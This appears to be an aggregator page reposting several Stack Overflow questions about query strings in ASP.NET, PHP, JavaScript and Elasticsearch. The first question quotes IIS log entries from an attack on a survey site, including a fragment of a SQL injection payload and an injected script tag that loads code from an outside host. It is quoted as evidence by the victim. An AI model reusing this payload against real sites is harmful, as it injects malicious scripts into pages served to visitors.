query-string

Attack on ASP site that uses a SQL server database

夙愿已清 提交于 2019-12-09 05:50:57
问题 We have a survey site that was apparently attacked. The symptoms are identical to what was described on the following page on this site: XSS Attack on the ASP.NET Website. I found multiple entries in our IIS logs that included the malicious code: < / title> < script src = http : // google-stats49.info/ur.php >. Here is an example of the value of the cs-uri-query field for one of the IIS log entries. surveyID=91+update+usd_ResponseDetails+set+categoryName=REPLACE(cast(categoryName+as+varchar

merge 2 input values in url

笑着哭i 提交于 2019-12-09 03:51:28
问题 I have form like this: <form action="" method="get"> Color: <input type="text" name="color"><br> Car: <input type="text" name="car"><br> <input type="submit"> </form> When i type color "red" and car "bmw" i get url like this http://mywebsite/?color=red&car=bmw how can i get car array into color on submit so that it would be like this http://mywebsite/?color=red+bmw 回答1: I don't really know of a way to modify the HTML form to produce that query string from two separate inputs. But in the PHP

Limiting the times that .split() splits, rather than truncating the resulting array

十年热恋 提交于 2019-12-09 02:38:23
问题 Really, pretty much what the title says. Say you have this string: var theString = "a=b=c=d"; Now, when you run theString.split("=") the result is ["a", "b", "c", "d"] as expected. And, of course, when you run theString.split("=", 2) you get ["a", "b"] , which after reading the MDN page for String#split() makes sense to me. However, the behavior I'm looking for is more like Java's String#split() : Instead of building the array normally, then returning the first n elements, it builds an array

ASP.NET: URI handling

倾然丶 夕夏残阳落幕 提交于 2019-12-09 00:41:13
问题 I'm writing a method which, let's say, given 1 and hello should return http://something.com/?something=1&hello=en . I could hack this together pretty easily, but what abstraction functionality does ASP.NET 3.5 provide for building URIs? I'd like something like: URI uri = new URI("~/Hello.aspx"); // E.g. ResolveUrl is used here uri.QueryString.Set("something", "1"); uri.QueryString.Set("hello", "en"); return uri.ToString(); // /Hello.aspx?something=1&hello=en I found the Uri class which sounds

elasticsearch boost importance of exact phrase match

倾然丶 夕夏残阳落幕 提交于 2019-12-08 23:05:44
问题 Is there a way in elasticsearch to boost the importance of the exact phrase appearing in the the document? For example if I was searching for the phrase "web developer" and if the words "web developer" appeared together they would be boosted by 5 compared to "web" and "developer" appearing separately throughout the document. Thereby any document that contained "web developer" together would appear first in the results. 回答1: You can combine different queries together using a bool query, and

Pass hidden field value using Jquery

怎甘沉沦 提交于 2019-12-08 18:30:41
I have a normal hidden Input field where I am generating random string . I need that to be appended to the URL where I am trying to post data to another page. I have done this and works pretty well. url:'Upload.html?field1=newvalue', This is my hidden input field <input type="hidden" id="randomdirectory"/> Now instead of newvalue in the query string I need to pass my random directory value . easily accomplished just do the following var value = $("#randomdirectory").val(); url:'Upload.html?field1='+value , thats it .. Just give a name to the hidden field. <input name="field1" type="hidden" id=

onselect checkbox add selected value to the URL as querystring

泄露秘密 提交于 2019-12-08 11:06:03
问题 The page loads with the URL as http://mysite.aspx/result.aspx?k=("Hospital"). Now after the page load, if someone selects Offices checkbox, it should append the value of that Checkbox 'Office' to the URL as http://mysite.aspx/result.aspx?k=("Hospital" OR "Office") How do I do this in jquery? <div class="LocationSearchBox"> <input name="KeywordBox" class="BasicSearchInputBox" type="text" value="Type a Keyword.."/> <div class="searchBtnHolder"><a class="searchButton" href="#" type="submit">

How should I structure my query string in MVC htaccess applications?

送分小仙女□ 提交于 2019-12-08 05:42:32
问题 I was wondering about creating "fake" URL queries in a web application. When you put a .htaccess file in the root folder of a project you can rewrite (behind the scenes) this URL http://www.website.com/blog/view into http://www.website.com/index.php?q=blog/view . That way you can maintain a single access point and create a MVC application out of the path in $_GET["q"] . But what about actual query strings? Surely this type of rewrite doesn't offer the flexibility of inputting a variable query

How to safely include password in query string

馋奶兔 提交于 2019-12-08 04:53:09
问题 Is it possible to safely include a password in a query string for a c# asp.net site. Few assumptions and things I know - The site does not and will not have links/images/javascript/analytics to/from other sites. So no referrer links to worry about. ALL communication with the web browser will be over https. I know that the query string will remain in the history of the computer. More than just the password/username is needed to login. So simply pasting the url back into the browser will not

URL with Cyrrilic querystring not working in IE (but working in Firefox)

自古美人都是妖i 提交于 2019-12-08 04:35:49
问题 On our site, I use the category (in Russian) in the querystring. E.g.: http://www.odinklik.ru/kategoriya.aspx?cat=люди If you paste this link in IE8, it is translated to cat=???? and it does not work If I paste it in FireFox, it works. It gets even more weird: the same URL is reachable from the homepage, and if I click the same URL in IE8 from the homepage it works fine (unless I click open in a new tab, that it is back to ????). I am using ASP.NET 3.5(C#) 回答1: Did you try to do encoding on
订阅 query-string